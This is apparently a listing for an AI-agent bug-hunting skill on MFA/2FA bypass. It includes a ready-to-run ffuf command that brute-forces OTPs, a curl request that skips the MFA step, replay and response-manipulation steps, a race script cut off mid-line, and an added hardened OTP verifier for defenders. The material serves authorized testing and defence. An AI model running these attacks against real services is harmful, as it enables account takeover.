
hunt-mfa-bypass

Hunt MFA / 2FA bypass — 7 distinct patterns. (1) MFA not enforced on sensitive endpoints (password change, email change accept without MFA challenge), (2) MFA-step skip via direct navigation to post-login URL, (3) MFA-token replay (same code accepted twice), (4) brute-force the 6-digit OTP without rate limit (10^6 attempts at server speed), (5) race condition on OTP validation, (6) recovery-code dump via /api/me, (7) backup factor downgrade (SMS factor with no rate limit). Plus the chain: cookie theft + password oracle + no step-up = ATO without MFA challenge. Detection: trace auth flow in Burp, find every state transition, check if MFA is middleware-gated vs per-endpoint, check OTP entropy and rate limit on OTP-validate. Validate: attacker session reaching post-MFA state. Use when hunting auth bypass, MFA flows, chaining primitives toward ATO.
elementalsouls/Claude-BugHunter · ★ 1,478 · API & Backend · score 83
Install: claude install-skill elementalsouls/Claude-BugHunter
## 19. MFA / 2FA BYPASS

> Growing bug class — 7 distinct patterns. Pays High/Critical when it enables ATO without prior session.

### Pattern 1: No Rate Limit on OTP

```bash
# Test with ffuf — all 1M 6-digit codes
ffuf -u "https://target.com/api/verify-otp" \
  -X POST -H "Content-Type: application/json" \
  -H "Cookie: session=YOUR_SESSION" \
  -d '{"otp":"FUZZ"}' \
  -w <(seq -w 000000 999999) \
  -fc 400,429 -t 5
# -t 5 (slow down) — aggressive rates get 429 or ban
```

### Pattern 2: OTP Not Invalidated After Use

```
1. Login → receive OTP "123456" → enter it → success
2. Logout → login again with same credentials
3. Try OTP "123456" again
4. If accepted → OTP never invalidated = ATO (attacker sniffs OTP once, reuses forever)
```

### Pattern 3: Response Manipulation

```
1. Enter wrong OTP → capture response in Burp
2. Change {"success":false} → {"success":true} (or 401 → 200)
3. Forward → if app proceeds → client-side only MFA check
```

### Pattern 4: Skip MFA Step (Workflow Bypass)

```bash
# After entering password, app sets a "pre-mfa" cookie → redirects to /mfa
# Test: skip /mfa entirely, access /dashboard directly with pre-mfa cookie
# If app grants access without MFA = auth flow bypass = Critical
curl -s -b "session=PRE_MFA_SESSION" https://target.com/dashboard
```

### Pattern 5: Race on MFA Verification

```python
import asyncio, aiohttp

async def verify(session, otp):
    async with session.post("https://target.com/api/mfa/verify", js
```
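As the defender-side counterpart to the patterns above (an added example, not code from the skill or the Claude-BugHunter project): a server-side OTP verifier that enforces a per-session attempt cap (Pattern 1), single-use codes (Pattern 2), a server-decided result (Pattern 3), an MFA state gate for post-login routes (Pattern 4) and an atomic check-and-consume so parallel submissions cannot both succeed (Pattern 5). The class and function names, the in-memory session object and the attempt threshold are assumptions for this example.

```python
"""Hardened OTP verification (added example; names and the in-memory store are assumptions)."""
import hmac
import threading

MAX_ATTEMPTS = 5  # lockout threshold per MFA session; production also rate-limits per account/IP


class OtpSession:
    """Login session that sits in 'pre_mfa' until exactly one correct OTP is consumed."""

    def __init__(self, otp_code):
        self.state = "pre_mfa"      # becomes "authenticated" only through verify()
        self.otp_code = otp_code    # None once consumed or locked out
        self.attempts = 0
        self._lock = threading.Lock()

    def verify(self, submitted):
        """Return True exactly once for the correct code; False for every other submission."""
        with self._lock:  # atomic check-and-consume: concurrent requests serialize here
            if self.state != "pre_mfa" or self.otp_code is None:
                return False  # already authenticated, consumed, or locked out
            self.attempts += 1
            ok = hmac.compare_digest(self.otp_code, submitted)  # constant-time compare
            if ok:
                self.state = "authenticated"
                self.otp_code = None  # single use: replaying the same code now fails
            elif self.attempts >= MAX_ATTEMPTS:
                self.otp_code = None  # lockout: no further guesses on this session
            return ok


def require_mfa(session):
    """Middleware-style gate for post-MFA routes such as /dashboard: pre-MFA sessions are rejected."""
    return session.state == "authenticated"


def concurrent_verify_count(session, submitted, n=20):
    """Regression check for Pattern 5: submit the same code from n threads, count acceptances."""
    results = []
    threads = [threading.Thread(target=lambda: results.append(session.verify(submitted)))
               for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)  # must be 1: only one racing request may win
```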